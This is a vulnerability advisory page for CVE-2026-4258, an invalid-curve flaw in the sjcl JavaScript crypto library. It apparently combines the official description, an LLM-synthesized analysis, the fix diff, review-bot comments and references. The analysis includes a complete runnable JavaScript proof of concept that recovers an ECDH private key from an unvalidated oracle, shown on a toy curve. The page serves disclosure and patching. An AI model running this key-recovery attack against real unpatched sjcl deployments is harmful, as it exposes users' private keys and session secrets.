CVE-2026-4258
Description
All versions of the package sjcl are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey(). An attacker can recover a victim's ECDH private key by sending crafted off-curve public keys and observing ECDH outputs. The dhJavaEc() function directly returns the raw x-coordinate of the scalar multiplication result (no hashing), providing a plaintext oracle without requiring any decryption feedback.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SJCL (all versions with ECC support) lacks point-on-curve validation in publicKey(), enabling an invalid curve attack that recovers ECDH private keys via crafted off-curve public keys.
Vulnerability
Overview
The Stanford Javascript Crypto Library (SJCL) package sjcl (versions 1.0.0 through 1.0.8, when built with the ECC module) is vulnerable to an invalid curve attack because the sjcl.ecc.basicKey.publicKey() constructor does not validate points it receives as objects [1][2]. When a sjcl.ecc.point is passed directly (rather than as a bit array), the constructor stores it without calling isValid(), bypassing the curve-membership check that the fromBits() path performs [2][3]. The short-Weierstrass group law uses only the coefficient a, never b, so scalar multiplication runs a perfectly well-formed computation on a point taken from a different curve y^2 = x^3 + ax + b'. An attacker can therefore supply a point of small order on such a curve, and the victim's ECDH code accepts it and multiplies it by the private scalar.
Attack
Vector and Exploitation
An active attacker sends a series of crafted off-curve public keys to a victim that uses SJCL's ECDH functions. The victim's dh() or dhJavaEc() methods multiply the attacker-supplied point by the victim's private scalar [2]. Critically, dhJavaEc() returns the raw x-coordinate of the resulting point without hashing or any further processing, so the victim hands back the shared secret itself [1][2]. No decryption feedback or secondary oracle is needed; the attacker observes the output of each exchange directly. dh(), which hashes the resulting point with SHA-256 before returning it, is not safe either when its output can be observed: the attacker only has to hash each of the few candidate points and compare. For each crafted point Q of small prime order r on a curve that shares a with the real one, the returned x-coordinate reveals d mod r up to sign, since kQ and (r - k)Q have the same x-coordinate. Repeating this with several distinct small primes and combining the residues with the Chinese remainder theorem recovers the full private scalar, with the sign ambiguities resolved against the victim's public key.
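The vulnerable constructor path from the Overview, the key-recovery procedure just described, and the 1.0.9 check from the Mitigation section, as one added worked example. This is illustration code written for this page; it is neither sjcl's code nor the reporter's proof of concept. It assumes a toy curve y^2 = x^3 + 3x + 7 over F_1009, a fixed private scalar, and the names publicKey, dhJavaEc, makeVictim and recoverKey, which mirror sjcl's API in shape only. It also handles the x-only ambiguity (k and r - k share an x-coordinate) that the paragraph above only mentions, and it shows that with validation switched on the first forged point is rejected and the attack stops.

```javascript
// Added example (not sjcl code): invalid-curve attack on an sjcl-style ECDH oracle.
// Toy curve over F_1009 so it runs in milliseconds under Node (BigInt required);
// parameters are chosen for the demo and bear no relation to sjcl's real curves.
const P = 1009n;  // toy field prime (assumption)
const A = 3n;     // coefficient a, shared by the real curve and every forged curve
const B = 7n;     // the victim's real curve: y^2 = x^3 + A*x + B

const mod = (x, m = P) => ((x % m) + m) % m;
function modInv(x, m = P) {                 // extended Euclid; x must be invertible mod m
  let [a, b, u, v] = [mod(x, m), m, 1n, 0n];
  while (b !== 0n) { const q = a / b; [a, b] = [b, a - q * b]; [u, v] = [v, u - q * v]; }
  return mod(u, m);
}
// Affine short-Weierstrass group law; null is the point at infinity. B never appears:
// add/double only use A, so the same code "works" on any y^2 = x^3 + A*x + b'.
function add(p1, p2) {
  if (!p1) return p2; if (!p2) return p1;
  if (p1.x === p2.x && mod(p1.y + p2.y) === 0n) return null;
  const l = p1.x === p2.x ? mod((3n * p1.x * p1.x + A) * modInv(2n * p1.y))
                          : mod((p2.y - p1.y) * modInv(p2.x - p1.x));
  const x = mod(l * l - p1.x - p2.x);
  return { x, y: mod(l * (p1.x - x) - p1.y) };
}
function mul(k, pt) {                       // double-and-add scalar multiplication
  let r = null;
  for (let q = pt; k > 0n; k >>= 1n) { if (k & 1n) r = add(r, q); q = add(q, q); }
  return r;
}
function curvePoints(b) {                   // all affine points of y^2 = x^3 + A*x + b
  const sqrt = new Map();                   // square -> its square roots mod P
  for (let y = 0n; y < P; y++) { const s = mod(y * y); sqrt.set(s, [...(sqrt.get(s) || []), y]); }
  const pts = [];
  for (let x = 0n; x < P; x++) for (const y of sqrt.get(mod(x ** 3n + A * x + b)) || []) pts.push({ x, y });
  return pts;
}
const onCurve = (pt, b = B) => pt !== null && mod(pt.y * pt.y) === mod(pt.x ** 3n + A * pt.x + b);
function primeFactors(n) {                  // distinct prime factors by trial division
  const f = [];
  for (let q = 2n; q * q <= n; q++) if (n % q === 0n) { f.push(q); while (n % q === 0n) n /= q; }
  if (n > 1n) f.push(n);
  return f;
}
function orderOf(pt, n) {                   // smallest divisor k of the group order n with k*pt = O
  for (let k = 1n; ; k++) if (n % k === 0n && mul(k, pt) === null) return k;
}

// Victim, modelled on sjcl.ecc: publicKey() stores a point object as-is (pre-1.0.9)
// or rejects one that fails the curve equation (the 1.0.9 check); dhJavaEc()
// returns the raw x-coordinate of d*pk, the oracle the advisory describes.
function publicKey(pt, validate) {
  if (validate && !onCurve(pt)) throw new Error("corrupt: not on the curve!");
  return { _point: pt };
}
const dhJavaEc = (d, pk) => { const r = mul(d, pk._point); return r ? r.x : null; };
function makeVictim(validate = false) {
  const pts = curvePoints(B), n = BigInt(pts.length + 1);
  let G = pts[0], nG = orderOf(G, n);       // generator: largest order among the first few points
  for (const pt of pts.slice(1, 8)) { const o = orderOf(pt, n); if (o > nG) { G = pt; nG = o; } }
  const d = mod(0x2a7n, nG) || 1n;          // fixed private scalar so the run is reproducible
  return { d, G, nG, pub: mul(d, G), oracle: pt => dhJavaEc(d, publicKey(pt, validate)) };
}

// Attacker: on forged curves y^2 = x^3 + A*x + b' find a point Q of small prime
// order r, ask the victim for x(d*Q), brute-force k with x(k*Q) = x(d*Q) (k and
// r-k share an x, so usually two candidates), then combine the residues with CRT.
function crt(pairs) {                       // [[residue, modulus], ...], moduli pairwise coprime
  let x = 0n, m = 1n;
  for (const [a, r] of pairs) { x += m * mod((a - x) * modInv(m % r, r), r); m *= r; }
  return x;
}
function recoverKey({ G, nG, pub, oracle }) {
  const residues = []; let M = 1n;
  for (let b = 1n; b < P && M <= nG; b++) {
    if (b === B || mod(4n * A ** 3n + 27n * b * b) === 0n) continue;  // skip real and singular curves
    const pts = curvePoints(b), n = BigInt(pts.length + 1);
    for (const r of primeFactors(n)) {
      if (r > 50n || residues.some(e => e.r === r)) continue;         // small, not-yet-used primes only
      let Q = null;
      for (const R of pts) { Q = mul(n / r, R); if (Q) break; }       // Q has exact order r
      if (!Q) continue;
      const seen = oracle(Q);                                         // the victim accepts off-curve Q
      const cands = [];
      for (let k = 0n; k < r; k++) { const kQ = mul(k, Q); if ((kQ ? kQ.x : null) === seen) cands.push(k); }
      residues.push({ r, cands }); M *= r;
    }
  }
  let combos = [[]];
  for (const { r, cands } of residues) combos = combos.flatMap(c => cands.map(k => [...c, [k, r]]));
  for (const c of combos) {                   // resolve the +/- ambiguity against the public key
    const d = crt(c), dG = mul(d, G);
    if (d < nG && dG && dG.x === pub.x && dG.y === pub.y) return d;
  }
  return null;
}

const victim = makeVictim(false);
console.log("recovered:", recoverKey(victim), "actual:", victim.d);
try { recoverKey(makeVictim(true)); } catch (e) { console.log("with the 1.0.9 check:", e.message); }
```

The attacker never needs the victim's curve coefficient b: every forged point is chosen on a curve with the same a, which is all the group law reads. Each query costs the attacker at most r scalar multiplications to match the returned x-coordinate, and the loop stops as soon as the product of the collected prime orders exceeds the generator's order, at which point the private scalar is pinned down except for the per-prime sign choices, which the public key settles.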
Impact
Successful exploitation recovers the victim's full ECDH private key [1][2]. With that key the attacker can derive the shared secret of any recorded past exchange and of any future exchange that uses the same key, so every session protected by the affected SJCL ECDH implementation loses confidentiality. The CVSS 3.1 base score is 5.9 (Medium) under the standard assessment, but because dhJavaEc() returns the shared secret directly rather than through a hash, a score of 7.5 (High) could be justified [2].
Mitigation
Status
The SJCL project has acknowledged the vulnerability and released version 1.0.9, which adds the missing point-on-curve validation [4]. Users are strongly advised to upgrade to SJCL 1.0.9 or later. The project is deprecated and recommends against using SJCL in new projects; users should move to a maintained alternative [4]. Versions before 1.0.9 have no configuration-level workaround; the only interim measure is to backport the fix, that is, to call isValid() on every sjcl.ecc.point before handing it to publicKey(), or to construct public keys from bit arrays only, since the fromBits() path already validates.
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| sjcl (npm) | < 1.0.9 | 1.0.9 |
Affected products
- sjcl/sjcl
Patches
ee3074599724 fix a vulnerability to invalid curve attacks
2 files changed · +7 −1
core/ecc.js+4 −0 modified@@ -460,6 +460,10 @@ sjcl.ecc.basicKey = { this._point = point; } + if (!this._point.isValid()) { + throw new sjcl.exception.corrupt("not on the curve!"); + } + this.serialize = function () { var curveName = sjcl.ecc.curveName(curve); return {
README.md+3 −1 modified@@ -3,7 +3,7 @@ Deprecation status ==== -Having not been updated in many years, sjcl is deprecated. Please do not use it in new projects, and consider instead a more modern alternative. +Having not been updated in many years (except to fix one serious vulnerability, described below), sjcl is deprecated. Please do not use it in new projects, and consider instead a more modern alternative. [](https://travis-ci.org/bitwiseshiftleft/sjcl) @@ -16,6 +16,8 @@ Security Advisories * 12.02.2014: the current development version has a paranoia bug in the ecc module. The bug was introduced in commit [ac0b3fe0](https://github.com/bitwiseshiftleft/sjcl/commit/ac0b3fe0) and might affect ecc key generation on platforms without a platform random number generator. +* 03.08.2026: According to https://gist.github.com/Kr0emer/2560f98edb10b0b34f2438cd63913c47, sjcl is vulnerable due to missing point-on-curve validation in `sjcl.ecc.basicKey.publicKey()`. An attacker can recover a victim's ECDH private key by sending crafted off-curve public keys and observing ECDH outputs. The `dhJavaEc()` function directly returns the raw x-coordinate of the scalar multiplication result (no hashing), providing a plaintext oracle without requiring any decryption feedback. This bug is fixed in SJCL 1.0.9. Thanks to Kr0emer for reporting it, and to the the Snyk security team for relaying this information. + Security Contact ==== Security Mail: sjcl@ovt.me
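Review bot: the new isValid() check in the core/ecc.js hunk lands without a test; the commit touches only core/ecc.js and README.md (2 files changed). Add a regression test that builds a sjcl.ecc.point whose coordinates do not satisfy the curve equation, passes it to publicKey() directly, and asserts that sjcl.exception.corrupt is thrown, plus one confirming the bit-array path still accepts a valid key. A one-line comment above the check explaining why it exists (the point-object path previously skipped validation) would also help, since the message "not on the curve!" on its own does not convey the invalid-curve attack the commit message refers to.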
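Review bot: typo in the added README advisory line, "to the the Snyk security team" doubles "the". The entry also states only that the bug "is fixed in SJCL 1.0.9" and cites the gist; stating that every earlier release with the ecc module is affected and adding the advisory identifiers (GHSA-2w8x-224x-785m, CVE-2026-4258) would let users and scanners cross-reference it.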
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-2w8x-224x-785m (ghsa, advisory)
- nvd.nist.gov/vuln/detail/CVE-2026-4258 (ghsa, advisory)
- gist.github.com/Kr0emer/2560f98edb10b0b34f2438cd63913c47 (ghsa, web)
- github.com/bitwiseshiftleft/sjcl/blob/master/core/ecc.js (ghsa, web)
- github.com/bitwiseshiftleft/sjcl/commit/ee307459972442a17beebc29dc331fffd8aff796 (ghsa, web)
- security.snyk.io/vuln/SNYK-JS-SJCL-15369617 (ghsa, web)
- github.com/bitwiseshiftleft/sjcl/blob/master/core/ecc.js#L454-L461 (mitre)
News mentions
No linked articles in our index yet.